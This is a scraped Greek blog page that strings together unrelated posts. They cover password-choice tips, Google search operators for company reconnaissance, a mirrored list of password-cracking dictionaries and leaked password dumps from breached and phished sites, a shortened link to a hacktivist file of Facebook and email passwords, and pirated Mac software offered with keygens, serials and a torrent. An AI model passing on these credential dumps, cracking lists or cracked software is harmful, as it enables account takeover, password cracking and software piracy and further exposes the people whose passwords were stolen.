The average person has a working vocabulary of 50,000 to 150,000 words, and they are likely to be used in the password.
Women are famous for using personal names in their passwords, and men opt for their hobbies.
"Tigergolf" is not as unique as CEOs think.
Even if you use a symbol, an attacker knows which are most likely to appear: ~, !, @, #, $, %, &, and?.

When your password has to be 'least 8 characters long and include at least one capital' it doesn't mean: 'MickeyMinniePlutoHueyLouieDeweyDonaldGoofyLondon'. And for the people that made it this far down, here is a 'riddle' on the the subject of passwords.
Διαβάστε Περισσότερα »

FxFactory Pro 6.0.0.5066

NameFxFactory_Pro_v6.0.0.5066.zip
Size138.9 MB
Created on2016-10-09 17:44:32
Hashe56a7f7939315428c22940b2196f967392c9b02f
FilesFxFactory_Pro_v6.0.0.5066.zip (138.9 MB)











Description

Name: FxFactory for Mac Version: 6.0.0 Language: English Release Date: 23 Sep 2016 Mac Platform: Intel OS version:OS X 10.11 or later Processor type(s) & speed: 64-bit One of the following: ・Apple Final Cut Pro X 10.2 ・Motion 5.2 ・Adobe After Effects CC, CC 2014, CC 2015, or CC 2015.3 ・Adobe Premiere Pro CC, CC 2014, CC 2015, or CC 2015.3 Includes: Keygen and Serials Web Site: https://fxfactory.com/ Overview: FxFactoryis a revolutionary visual effects package which powers the largest collection of plug-ins for Final Cut Pro, Motion, After Effects, and Premiere Pro. The program offers an all-in-one video expandable to over 170 plug-ins for video stylization, color correction, animation frames, typing, stereoscopic 3D and titling. The new release also includes updates to Photo Montage, Motype, Calls, Cleaner, Split Animator and FxFactory Pro. What's New in Version 6.0.0: ・Designed and optimized for macOS 10.12 Sierra 
/DOWNLOAD/
Διαβάστε Περισσότερα »

11 Οκτωβρίου 2016

Google Commands


Tips

Using Google to find what type of technologies a company is using:

site:<companydomain> careers
site:<companydomain> jobs
site:<companydomain> openings







site:<site>
link:<site>
related:<site>
intitle:<text>
inurl:<text>
filetype:<type>
'.' = wildcard
'..' = range ('2007..2009')
'~' = synonyms
Διαβάστε Περισσότερα »

Password dictionaries, Leaked


Password dictionaries

These are dictionaries that come with tools/worms/etc, designed for cracking passwords. As far as I know, I'm not breaking any licensing agreements by mirroring them with credit; if you don't want me to host one of these files, let me know and I'll remove it.
Name Compressed Uncompressed Notes
John the Ripper john.txt.bz2 (10,934 bytes) n/a Simple, extremely good, designed to be modified
Cain & Abel cain.txt.bz2 (1,069,968 bytes) n/a Fairly comprehensive, not ordered
Conficker worm conficker.txt.bz2 (1411 bytes) n/a Used by conficker worm to spread -- low quality
500 worst passwords 500-worst-passwords.txt.bz2 (1868 bytes) n/a
370 Banned Twitter passwords twitter-banned.txt.bz2 (1509 bytes) n/a

Leaked passwords

Passwords that were leaked or stolen from sites. I'm hosting them because it seems like nobody else does (hopefully it isn't because hosting them is illegal :)). Naturally, I'm not the one who stole these; I simply found them online, removed any names/email addresses/etc (I don't see any reason to supply usernames -- if you do have a good reason, email me (ron-at-skullsecurity.net) and I'll see if I have them.

The best use of these is to generate or test password lists.

Note: The dates are approximate.
Name Compressed Uncompressed Date Notes
Rockyou rockyou.txt.bz2 (60,498,886 bytes) n/a 2009-12 Best list available; huge, stolen unencrypted
Rockyou with count rockyou-withcount.txt.bz2 (59,500,255 bytes) n/a
phpbb phpbb.txt.bz2 (868,606 bytes) n/a 2009-01 Ordered by commonness
Cracked from md5 by Brandon Enright
(97%+ coverage)
phpbb with count phpbb-withcount.txt.bz2 (872,867 bytes) n/a
phpbb with md5 phpbb-withmd5.txt.bz2 (4,117,887 bytes) n/a
MySpace myspace.txt.bz2 (175,970 bytes) n/a 2006-10 Captured via phishing
MySpace - with count myspace-withcount.txt.bz2 (179,929 bytes) n/a
Hotmail hotmail.txt.bz2 (47,195 bytes) n/a Unknown Isn't clearly understood how these were stolen
Hotmail with count hotmail-withcount.txt.bz2 (47,975 bytes) n/a
Faithwriters faithwriters.txt.bz2 (39,327 bytes) n/a 2009-03 Religious passwords
Faithwriters - with count faithwriters-withcount.txt.bz2 (40,233 bytes) n/a
Elitehacker elitehacker.txt.bz2 (3,690 bytes) n/a 2009-07 Part of zf05.txt
Elitehacker - with count elitehacker-withcount.txt.bz2 (3,846 bytes) n/a
Hak5 hak5.txt.bz2 (16,490 bytes) n/a 2009-07 Part of zf05.txt
Hak5 - with count hak5-withcount.txt.bz2 (16,947 bytes) n/a
Älypää alypaa.txt.bz2 (5,178 bytes) n/a 2010-03 Finnish passwords
alypaa - with count alypaa-withcount.txt.bz2 (6,013 bytes) n/a
Facebook (Pastebay) facebook-pastebay.txt.bz2 (375 bytes) n/a 2010-04 Found on Pastebay;
appear to be malware-stolen.
Facebook (Pastebay) - w/ count facebook-pastebay-withcount.txt.bz2 (407 bytes) n/a
Unknown porn site porn-unknown.txt.bz2 (30,600 bytes) n/a 2010-08 Found on angelfire.com. No clue where they originated, but clearly porn site.
Unknown porn site - w/ count porn-unknown-withcount.txt.bz2 (31,899 bytes) n/a
Ultimate Strip Club List tuscl.txt.bz2 (176,291 bytes) n/a 2010-09 Thanks to Mark Baggett for finding!
Ultimate Strip Club List - w/ count tuscl-withcount.txt.bz2 (182,441 bytes) n/a
[Facebook Phished] facebook-phished.txt.bz2 (14,457 bytes) n/a 2010-09 Thanks to Andrew Orr for reporting
Facebook Phished - w/ count facebook-phished-withcount.txt.bz2 (14,941 bytes) n/a
Carders.cc carders.cc.txt.bz2 (8,936 bytes) n/a 2010-05
Carders.cc - w/ count carders.cc-withcount.txt.bz2 (9,774 bytes) n/a
Singles.org singles.org.txt.bz2 (50,697 bytes) n/a 2010-10
Singles.org - w/ count singles.org-withcount.txt.bz2 (52,884 bytes) n/a
Unnamed financial site (reserved) (reserved) 2010-12
Unnamed financial site - w/ count (reserved) (reserved)
Gawker (reserved) (reserved) 2010-12
Gawker - w/ count (reserved) (reserved)
Free-Hack.com (reserved) (reserved) 2010-12
Free-Hack.com w/count (reserved) (reserved)
Carders.cc (second time hacked) (reserved) (reserved) 2010-12
Carders.cc w/count (second time hacked) (reserved) (reserved)

Statistics

I did some tests of my various dictionaries against the different sets of leaked passwords. I grouped them by the password set they were trying to crack:
cracked_500worst.png
cracked_elitehackers.png
cracked_faithwriters.png
cracked_hak5.png
cracked_hotmail.png
cracked_myspace.png
cracked_phpbb.png
cracked_rockyou.png
Miscellaneous non-hacking dictionaries

These are dictionaries of words (etc), not passwords. They may be useful for one reason or another.
Name Compressed Uncompressed Notes
English english.txt.bz2 (1,368,101 bytes) n/a My combination of a couple lists, from Andrew Orr, Brandon Enright, and Seth
German german.txt.bz2 (2,371,487 bytes) n/a Compiled by Brandon Enright
American cities us_cities.txt.bz2 (77,081 bytes) n/a Generated by RSnake
"Porno" porno.txt.bz2 (7,158,285 bytes) n/a World's largest porno password collection!
Created by Matt Weir
Honeynet honeynet.txt.bz2 (889,525 bytes) n/a From a honeynet run by Joshua Gimer
Honeynet - w/ count honeynet-withcount.txt.bz2 (901,868 bytes) n/a
File locations file-locations.txt.bz2 (1,724 bytes) n/a Potential logfile locations (for LFI, etc).
Thanks to Seth!
Fuzzing strings (Python) fuzzing-strings.txt.bz2 (276 bytes) n/a Thanks to Seth!
PHPMyAdmin locations phpmyadmin-locations.txt.bz2 (304 bytes) n/a Potential PHPMyAdmin locations.
Thanks to Seth!
Web extensions web-extensions.txt.bz2 (117 bytes) n/a Common extensions for Web files.
Thanks to dirb!
Web mutations web-mutations.txt.bz2 (177 bytes) n/a Common 'mutations' for Web files.
Thanks to dirb!


DirBuster has some awesome lists, too -- usernames and filenames.
Facebook lists

These are the lists I generated from this data. Some are more useful than others as password lists. All lists are sorted by commonness.

If you want a bunch of these, I highly recommend using the torrent. It's faster, and you'll get them all at once.
Name Compressed Uncompressed Date Notes
Full names facebook-names-unique.txt.bz2 (479,332,623 bytes) n/a 2010-08
Full names - w/ count facebook-names-withcount.txt.bz2 (477,274,173 bytes) n/a
First names facebook-firstnames.txt.bz2 (16,464,124 bytes) n/a 2010-08
First names - w/ count facebook-firstnames-withcount.txt.bz2 (73,134,218 bytes) n/a
Last names facebook-lastnames.txt.bz2 (21,176,444 bytes) n/a 2010-08
Last names - w/ count facebook-lastnames-withcount.txt.bz2 (21,166,232 bytes) n/a
First initial last names facebook-f.last.txt.bz2 (67,110,776 bytes) n/a 2010-08
First initial last names - w/ count facebook-f.last-withcount.txt.bz2 (66,348,431 bytes) n/a
First name last initial facebook-first.l.txt.bz2 (37,463,798 bytes) n/a 2010-08
First name last initial facebook-first.l-withcount.txt.bz2 (36,932,295 bytes) n/a


Διαβάστε Περισσότερα »

10 Οκτωβρίου 2016

"OpIsrael Of Gaza Hacker Team # In Password FaceBook And Email" .txt



Κλικ στον παρακάτω σύνδεσμο!

Τα αρχεία .txt δεν φιλοξενούνται στο blog!
5 seconds...


http://linkshrink.net/7crDaX
Διαβάστε Περισσότερα »

Daylite Server 6.0.6


Βελτιώνει την παραγωγικότητα και την αποδοτικότητα μιας επιχείρησης με Daylite.

Η τεχνολογία μπορεί να μας βοηθήσει να διαχειριστείτε την επιχείρησή μας αποτελεσματικά. Στην πραγματικότητα, υπάρχει είναι ένα τεράστιο ποσό του λογισμικού που μας βοηθά να οργανώσετε, να επανεξετάσει και να διατηρήσει τον έλεγχο των αποθεμάτων, συναντήσεις χρονοδιάγραμμα, και πολλά άλλα. Για όσους δεν επιθυμούν να έχουν διαφορετικές υπηρεσίες για κάθε μία από τις ανάγκες τους, και χρησιμοποιούν Mac, μια καλή εναλλακτική λύση μπορεί να είναι Daylite, ένα πρόγραμμα που έχει υπάρξει για πολύ και ότι είναι μία από τις καλύτερες εφαρμογές για το OS X. Daylite επιχειρήσεων πάντα ήξερα πώς να προσαρμοσθεί στους καιρούς, και τώρα θα δούμε πώς μπορεί να μας βοηθήσει να βελτιώσει την επιχείρησή μας.

Daylite είναι μία από τις επιχειρηματικές εφαρμογές που αναπτύχθηκαν από Marketcircle, και μας δίνει πολλές εναλλακτικές λύσεις όταν την παραγγελία. Είναι ιδανικό για τις μικρές επιχειρήσεις που ξαφνικά βρίσκουν τους εαυτούς τους αυξάνεται και χρειάζεται ένα εργαλείο που θα συνοδεύει αυτή την ανάπτυξη με την ενσωμάτωση πολλαπλών υπηρεσιών εφαρμογής. Έτσι, μέσα σε ένα μόνο παράθυρο θα είμαστε σε θέση να βρείτε όλα όσα χρειαζόμαστε, από το ηλεκτρονικό ταχυδρομείο, με χρονοδιάγραμμα, σε μια λίστα εργασιών, την επανεξέταση των στόχων, εκθέσεις, ομάδες και περισσότερο.

Όνομα: Daylite διακομιστή
Έκδοση: 6.0.6
Γλώσσα: Αγγλικά
Περιλαμβάνει: Serial

έκδοση του λειτουργικού συστήματος: 10.10 ή νεότερη
Περισσότερες πληροφορίες: https://www.marketcircle.com/daylite/

δωρεάν download torrent Daylite διακομιστή 6.0.6 για Mac OS X
Διαβάστε Περισσότερα »
Related Posts Plugin for WordPress, Blogger...